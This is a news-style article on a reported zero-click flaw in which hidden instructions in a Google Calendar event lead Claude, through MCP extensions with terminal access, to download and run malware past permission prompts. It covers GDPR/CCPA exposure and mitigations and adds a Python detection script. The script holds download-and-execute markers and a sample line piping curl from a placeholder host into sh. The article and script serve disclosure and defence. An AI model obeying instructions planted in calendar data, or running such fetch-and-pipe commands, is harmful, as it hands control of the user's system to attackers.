Claude Extension Vulnerability Turns Google Calendar Into Malware Delivery System

Privacy Reporter

A critical zero-click vulnerability in Anthropic's Claude Desktop Extensions enables attackers to deliver malware through Google Calendar events, with researchers warning the flaw violates core data protection principles under GDPR and CCPA.


Security researchers have uncovered a severe vulnerability in Anthropic's Claude Desktop Extensions (rebranded as MCP Bundles) that turns Google Calendar into an unwitting malware distribution channel. The flaw allows attackers to execute malicious code on victims' systems without any user interaction, simply by creating a poisoned calendar event.

How the Attack Works

According to Tel Aviv-based LayerX Security, the vulnerability stems from Claude's handling of external data sources combined with insufficient security boundaries. When users install MCP extensions - packaged applications that grant Claude access to other software - they create potential attack vectors. Particularly dangerous are extensions like Desktop Commander that provide terminal access.

The exploit chain begins when Claude processes a Google Calendar event containing hidden instructions. As principal researcher Roy Paz explained: "Claude will automatically process input from public-facing connectors like Google Calendar, and the AI model independently decides which installed MCP connectors to use."

This means a seemingly innocent calendar entry containing commands to download and execute malware can trigger a full system compromise when Claude processes the event. The AI interprets the instructions as legitimate tasks, bypassing all security prompts. The vulnerability earned a maximum CVSS severity rating of 10/10 due to its zero-click nature and total system access.

Regulatory Violations and Compliance Implications

This vulnerability creates significant legal exposure under major privacy regulations:

  1. GDPR Violations (Article 32): By allowing unfettered system access without proper sandboxing, Anthropic fails to implement "appropriate technical and organizational measures" to ensure security. If exploited, attackers could access personal data, triggering mandatory breach notifications and potential fines up to 4% of global revenue.

  2. CCPA Liability (1798.150): California's privacy law allows consumers to sue for statutory damages between $100-$750 per incident when inadequate security leads to unauthorized access. Enterprises using Claude extensions could face class actions if employee or customer data is compromised.

Anthropic's extensions hub claims extensions "run in sandboxed environments," but LayerX's analysis contradicts this. Paz notes: "Claude DXT's container falls noticeably short of what is expected from a sandbox. From an attacker's point of view it is the equivalent of setting your building code to 1234 and then leaving it unlocked."

Corporate Responsibility Shifted to Users

In a concerning development, Anthropic declined to address the flaw, stating it falls "outside our current threat model." The company's official response shifts responsibility to users: "Users maintain full control over which MCP servers they enable and the permissions those servers have."

This stance creates untenable compliance positions for businesses:

  • Risk Assessment Failure: Organizations using Claude extensions cannot reasonably claim due diligence under GDPR Article 35 when the vendor acknowledges unfixed critical vulnerabilities
  • Access Control Deficiencies: CCPA's requirement for "reasonable security procedures" becomes unattainable when core software deliberately bypasses permission prompts
  • Supply Chain Liability: Companies integrating Claude into workflows may face regulatory action for vendor management failures

Mitigation Strategies

Given Anthropic's inaction, users and organizations should immediately:

  1. Audit all installed MCP extensions and remove any providing system access
  2. Revoke Claude's calendar integration permissions
  3. Implement strict Group Policy controls blocking .dxt/.mcpb files in enterprise environments
  4. Monitor for suspicious process execution originating from Claude's runtime
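Mitigation step 4 calls for monitoring process execution that originates from Claude's runtime. The following is an added detection example, not code from LayerX, Anthropic or this article: it reads Sysmon-style process-creation events and flags shell or download-tool launches whose process ancestry leads back to the Claude desktop process, even when an MCP server (for example one running under node) sits in between. The image names, the node-hosted server, and all sample events are constructed assumptions.

```python
import json

# Assumed image names for the Claude runtime and for children worth flagging; adjust to your telemetry.
CLAUDE_IMAGES = {"claude", "claude.exe"}
RISKY_IMAGES = {"sh", "bash", "zsh", "cmd.exe", "powershell.exe", "pwsh",
                "curl", "wget", "certutil.exe", "bitsadmin.exe"}
DOWNLOAD_EXEC_MARKERS = ("curl ", "wget ", "Invoke-WebRequest", "DownloadString",
                         "chmod +x", "| sh", "| bash")

def basename(path):
    """Lower-cased file name of a Windows or POSIX image path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def claude_in_ancestry(pid, by_pid, max_depth=8):
    """Follow ParentProcessId links within the captured events; True if Claude is an ancestor."""
    seen = set()
    while pid in by_pid and pid not in seen and len(seen) < max_depth:
        seen.add(pid)
        event = by_pid[pid]
        if basename(event["Image"]) in CLAUDE_IMAGES:
            return True
        pid = event.get("ParentProcessId")
    return False

def scan(lines):
    """Return one alert per risky child process descended from the Claude runtime."""
    events = [json.loads(line) for line in lines if line.strip()]
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for e in events:
        image, cmd = basename(e["Image"]), e.get("CommandLine", "")
        if image in CLAUDE_IMAGES:
            continue  # the runtime itself is the anchor, not the suspect
        marker = any(m in cmd for m in DOWNLOAD_EXEC_MARKERS)
        if (image in RISKY_IMAGES or marker) and claude_in_ancestry(e.get("ParentProcessId"), by_pid):
            alerts.append({"pid": e["ProcessId"], "image": image,
                           "reason": "download-and-execute pattern" if marker else "shell spawned"})
    return alerts

# Constructed sample events (Sysmon-like fields, not real telemetry): Claude starts an MCP
# server under node, which launches a shell that pipes a download to sh; pid 400 is unrelated.
SAMPLE_EVENTS = [
    '{"ProcessId": 100, "ParentProcessId": 1, "Image": "/Applications/Claude.app/Contents/MacOS/Claude", "CommandLine": "Claude"}',
    '{"ProcessId": 200, "ParentProcessId": 100, "Image": "/usr/local/bin/node", "CommandLine": "node desktop-commander/index.js"}',
    '{"ProcessId": 300, "ParentProcessId": 200, "Image": "/bin/bash", "CommandLine": "bash -c \\"curl -s http://placeholder.invalid/x | sh\\""}',
    '{"ProcessId": 400, "ParentProcessId": 1, "Image": "/bin/bash", "CommandLine": "bash -lc ls"}',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Only the shell under the node-hosted MCP server is reported; the unrelated bash process with no Claude ancestor is not, which keeps the rule from firing on every interactive shell on the host.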

This vulnerability exemplifies the regulatory tightrope companies walk when implementing AI tools with external access. As Paz warns: "There are no hardcoded safeguards preventing Claude from constructing dangerous workflows." Until fundamental architectural changes occur, businesses risk becoming unwitting malware distribution points through seemingly benign productivity tools.

